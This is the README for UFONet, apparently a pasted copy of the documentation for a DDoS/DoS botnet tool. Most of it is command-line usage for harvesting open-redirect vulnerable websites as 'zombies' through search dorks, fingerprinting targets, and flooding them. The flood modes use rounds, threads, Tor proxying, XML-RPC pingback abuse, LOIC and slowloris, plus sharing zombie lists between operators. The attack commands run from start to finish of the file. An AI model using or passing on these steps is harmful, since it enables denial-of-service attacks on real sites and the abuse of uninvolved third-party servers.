README.txt 13 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461
  1. ===========================================================================
  2. 888 888 8888888888 .d88888b. 888b 888 888
  3. 888 888 888 d88PY888b 8888b 888 888
  4. 888 888 888 888 888 88888b 888 888
  5. 888 888 8888888 888 888 888Y88b 888 .d88b. 888888
  6. 888 888 888 888 888 888 Y88b888 d8P Y8b 888
  7. 888 888 888 888 888 888 Y88888 88888888 888
  8. Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.
  9. 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888
  10. ===========================================================================
  11. Welcome to UFONet [ DDoS+DoS ] Botnet/C&C/Darknet ;-)
  12. ===========================================================================
  13. ###############################
  14. # Project info
  15. ###############################
  16. - Website:
  17. https://ufonet.03c8.net
  18. - IRC:
  19. irc.freenode.net - #ufonet
  20. ###############################
  21. # FAQ
  22. ###############################
  23. https://ufonet.03c8.net/FAQ.html
  24. ###############################
  25. # Summary
  26. ###############################
  27. UFONet - is a tool designed to launch Layer 7 (HTTP/Web Abuse) DDoS & DoS attacks,
  28. using 'Open Redirect' vectors on third part web applications (a botnet).
  29. See these links for more info:
  30. - CWE-601:Open Redirect:
  31. http://cwe.mitre.org/data/definitions/601.html
  32. - OWASP:URL Redirector Abuse:
  33. https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2
  34. ###############################
  35. # Installing
  36. ###############################
  37. UFONet runs on many platforms. It requires Python (>2.7.9) and the following libraries:
  38. python-pycurl - Python bindings to libcurl
  39. python-geoip - Python bindings for the GeoIP IP-to-country resolver library
  40. python-whois - Python module for retrieving WHOIS information - Python 2
  41. python-crypto - Cryptographic algorithms and protocols for Python
  42. python-requests - elegant and simple HTTP library for Python2, built for human beings
  43. You can automatically get all required libraries using:
  44. python setup.py install
  45. For manual installation on Debian-based systems (ex: Ubuntu), run:
  46. sudo apt-get install python-pycurl python-geoip python-whois python-crypto python-requests
  47. On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... also run:
  48. pip install geoip
  49. pip install requests
  50. pip install pycrypto
  51. Source libs:
  52. * Python: https://www.python.org/downloads/
  53. * PyCurl: http://pycurl.sourceforge.net/
  54. * PyGeoIP: https://pypi.python.org/pypi/GeoIP/
  55. * PyWhois: https://pypi.python.org/pypi/whois
  56. * PyCrypto: https://pypi.python.org/pypi/pycrypto
  57. * PyRequests: https://pypi.python.org/pypi/requests
  58. ###############################
  59. # Searching for 'zombies'
  60. ###############################
  61. UFONet can dig on different search engines results to find possible 'Open Redirect' vulnerable sites.
  62. A common query string should be like this:
  63. 'proxy.php?url='
  64. 'check.cgi?url='
  65. 'checklink?uri='
  66. 'validator?uri='
  67. For example, you can begin a search with:
  68. ./ufonet -s 'proxy.php?url='
  69. Or providing a list of "dorks" from a file:
  70. ./ufonet --sd 'botnet/dorks.txt'
  71. By default UFONet will use a search engine called 'Yahoo'. But you can choose a different one:
  72. ./ufonet -s 'proxy.php?url=' --se 'bing'
  73. This is the list of available search engines with last time that they were working:
  74. - bing [06/03/2018: OK!]
  75. - yahoo [06/03/2018: OK!]
  76. You can also search massively using all search engines supported:
  77. ./ufonet -s 'proxy.php?url=' --sa
  78. To control how many 'zombies' recieved from the search engines reports you can use:
  79. ./ufonet --sd 'botnet/dorks.txt' --sa --sn 20
  80. Or you can make the tool to search for the maximun number of results automatically (this may take time!):
  81. ./ufonet --auto-search
  82. At the end of the process, you will be asked if you want to check the list retrieved to see
  83. if the urls are vulnerable.
  84. Want to check if they are valid zombies? (Y/n)
  85. Also, you will be asked to update the list adding automatically only the 'vulnerable' web apps.
  86. Want to update your list? (Y/n)
  87. If your answer is 'Y', your new 'zombies' will be appended to the file named: zombies.txt
  88. -------------
  89. Examples:
  90. + with verbose: ./ufonet -s 'proxy.php?url=' -v
  91. + with threads: ./ufonet --sd 'botnet/dorks.txt' --sa --threads 100
  92. ###############################
  93. # Testing botnet
  94. ###############################
  95. UFONet can test if your 'zombies' are vulnerable and can be used for attacking tasks.
  96. For example, open 'botnet/zombies.txt' (or another file) and create a list of possible 'zombies'.
  97. Remember that urls of the 'zombies' should be like this:
  98. http://target.com/check?uri=
  99. After that, launch:
  100. ./ufonet -t 'botnet/zombies.txt'
  101. You can test for XML-RPC Pingback vulnerability related 'zombies', with:
  102. ./ufonet --test-rpc
  103. To check if your 'zombies' are still infected testing the whole botnet (this may take time!) try this:
  104. ./ufonet --test-all
  105. And to check if your 'zombies' are still online run:
  106. ./ufonet --test-offline
  107. Finally, you can order your 'zombies' to attack you and see how they reply to your needs using:
  108. ./ufonet --attack-me
  109. At the end of the process, you will be asked if you want to check the list retrieved to see
  110. if the urls are vulnerable.
  111. Want to check if they are valid zombies? (Y/n)
  112. If your answer is 'Y', the file: "botnet/zombies.txt" will be updated.
  113. -------------
  114. Examples:
  115. + with verbose: ./ufonet -t 'botnet/zombies.txt' -v
  116. + with proxy TOR: ./ufonet -t 'botnet/zombies.txt' --proxy="http://127.0.0.1:8118"
  117. + with threads: ./ufonet -t 'botnet/zombies.txt' --threads 50
  118. + test whole botnet: ./ufonet --test-all
  119. + test XML-RPCs: ./ufonet --test-rpc
  120. + search for offlines: ./ufonet --test-offline
  121. + attack yourself: ./ufonet --attack-me
  122. ###############################
  123. # Inspecting a target
  124. ###############################
  125. UFONet can search for biggest file on your target by crawlering it:
  126. ./ufonet -i http://target.com
  127. You can use this before to attack to be more effective.
  128. ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"
  129. -------------
  130. Example:
  131. +input:
  132. ./ufonet -i http://target.com
  133. +output:
  134. [...]
  135. +Image found: images/wizard.jpg
  136. (Size: 63798 Bytes)
  137. ------------
  138. +Style (.css) found: fonts.css
  139. (Size: 20448 Bytes)
  140. ------------
  141. +Webpage (.php) found: contact.php
  142. (Size: 2483 Bytes)
  143. ------------
  144. +Webpage (.php) found: about.php
  145. (Size: 1945 Bytes)
  146. ------------
  147. +Webpage (.php) found: license.php
  148. (Size: 1996 Bytes)
  149. ------------
  150. ================================================================================
  151. =Biggest File: http://target.com/images/wizard.jpg
  152. ================================================================================
  153. -------------
  154. ###############################
  155. # Abducting a target
  156. ###############################
  157. UFONet can provide you some interesting information about your target:
  158. ./ufonet -x http://target.com
  159. -------------
  160. Example:
  161. +input:
  162. ./ufonet -x https://yahoo.com
  163. +output:
  164. [...]
  165. -Target URL: https://yahoo.com
  166. -IP : 206.190.39.42
  167. -IPv6 : OFF
  168. -Port : 443
  169. -Domain: yahoo.com
  170. -Bytes in : 550.09 KB
  171. -Load time: 9.10 seconds
  172. -Banner: ATS
  173. -Vía : http/1.1 usproxy3.fp.ne1.yahoo.com (ApacheTrafficServer),
  174. http/1.1 media-router-fp25.prod.media.ir2.yahoo.com (ApacheTrafficServer [cMsSf ])
  175. -WAF/IDS: FIREWALL NOT PRESENT (or not discovered yet)! ;-)
  176. -Reports:
  177. + CVE-2017-7671 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7671
  178. + CVE-2017-5660 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5660
  179. [...]
  180. ---------
  181. [Info] Abduction finished... ;-)
  182. -------------
  183. ###############################
  184. # Attacking a target
  185. ###############################
  186. UFONet can attack your target in many different ways.
  187. For example, enter a target to attack with a number of rounds:
  188. ./ufonet -a http://target.com -r 10
  189. On this example UFONet will attack the target a number of 10 times for each 'zombie'. That means that
  190. if you have a list of 1.000 'zombies' it will launch 1.000 'zombies' x 10 rounds = 10.000 requests to the target.
  191. If you don't put any round it will apply only 1 by default.
  192. Additionally, you can choose a place to recharge on target's site. For example, a large image,
  193. a big size file or a flash movie. In some scenarios where targets doesn't use cache systems
  194. this will make the attack more effective.
  195. ./ufonet -a http://target.com -b "/images/big_size_image.jpg"
  196. -------------
  197. Examples:
  198. + with verbose: ./ufonet -a http://target.com -r 10 -v
  199. + with proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
  200. + with a place: ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
  201. + with threads: ./ufonet -a http://target.com -r 10 --threads 500
  202. ###############################
  203. # Special attacks
  204. ###############################
  205. UFONet uses different ways to exploit 'Open Redirect' vulnerabilities.
  206. You can use UFONet to stress database on target by requesting random valid strings as search queries:
  207. ./ufonet -a http://target.com --db "search.php?q="
  208. Also, it exploits (by default) XML-RPC Pingback Vulnerability, generating callback requests and increasing
  209. processing required by target.
  210. You can test your list of 'XML-RPCs zombies' launching:
  211. ./ufonet --test-rpc
  212. At same time, you can connect a LOIC (with proxy support), to make a determinate number of recursive requests
  213. directly to your target:
  214. ./ufonet -a http://target.com --loic 100
  215. You can connect a LORIS to make requests leave open threads on the target too, making the web server
  216. work slower:
  217. ./ufonet -a http://target.com --slow 100
  218. Both ways could be combined, so UFONet can attack DDoS and DoS at the same time:
  219. ./ufonet -a http://target.com --loic 100 --slow 100
  220. ###############################
  221. # Updating
  222. ###############################
  223. UFONet has implemented an option to update the tool to the latest stable version.
  224. This feature can be used only if you have cloned it from GitHub respository.
  225. To check your version you should launch:
  226. ./ufonet --update
  227. This will update the tool automatically removing all files from old package.
  228. ###############################
  229. # Generating a 'Blackhole'
  230. ###############################
  231. UFONet has some P2P options to share/keep 'zombies' with other 'motherships'.
  232. * Setup web server with a folder "ufonet", this folder should be:
  233. - located in /var/www/ufonet (default debian/ubuntu install)
  234. - owned by the user running the blackhole
  235. - accessible with http://your-ip/ufonet/
  236. * Start the blackhole with: ./ufonet --blackhole (or python2 blackhole.py)
  237. * Anyone wanting to connect to your server needs to set the --up-to/--down-from
  238. to the ip address of your webserver...
  239. [!]WARNING : this *ADVANCED* function is *NOT* secure, proceed if you really want to.
  240. To start a new 'blackhole' launch:
  241. ./ufonet --blackhole
  242. ###############################
  243. # GUI/Web Interface
  244. ###############################
  245. You can manage UFONet using a Web Interface. The tool has implemented a python web server
  246. connected to the core providing you a more user friendly experience.
  247. To launch it use:
  248. ./ufonet --gui
  249. This will open a tab on your default browser with all features of the tool and some 'extra' options:
  250. - NEWS: Allows to read last "news" published by a "mothership"
  251. - MISSIONS: Allows to read last "missions" published by a "mothership"
  252. - SHIP STATS: Allows to review statistics from your "spaceship"
  253. - BOARD: Allows to send/receive messages to/from a "mothership" (a forum)
  254. - WARPS: Allows to interact with a "mothership" to download/upload "zombies"
  255. - GLOBAL GRID: Allows to review statistics from other "spaceships"
  256. - WARGAMES: Allows to propose and interact with some real "wargames"
  257. ###############################
  258. # Timelog
  259. ###############################
  260. --------------------------
  261. 08.03.2018 : v.1.0
  262. --------------------------
  263. --------------------------
  264. 14.07.2017 : v.0.9b
  265. --------------------------
  266. --------------------------
  267. 21.10.2016 : v.0.8b
  268. --------------------------
  269. --------------------------
  270. 17.08.2016 : v.0.7b
  271. --------------------------
  272. --------------------------
  273. 05.11.2015 : v.0.6b
  274. --------------------------
  275. --------------------------
  276. 24.05.2015 : v.0.5b
  277. --------------------------
  278. --------------------------
  279. 15.12.2014 : v.0.4b
  280. --------------------------
  281. --------------------------
  282. 27.09.2014 : v.0.3.1b
  283. --------------------------
  284. --------------------------
  285. 20.09.2014 : v.0.3b
  286. --------------------------
  287. --------------------------
  288. 22.06.2013 : v.0.2b
  289. --------------------------
  290. --------------------------
  291. 18.06.2013 : v.0.1b
  292. --------------------------
  293. ###############################
  294. # Thanks to
  295. ###############################
  296. - UFo & Mandingo & Ikujam
  297. - Phineas Fisher ;-)
  298. - The Shadow Brokers (TSB) ;_)
  299. - World Wide Antifas >-)
  300. -------------------------
  301. ############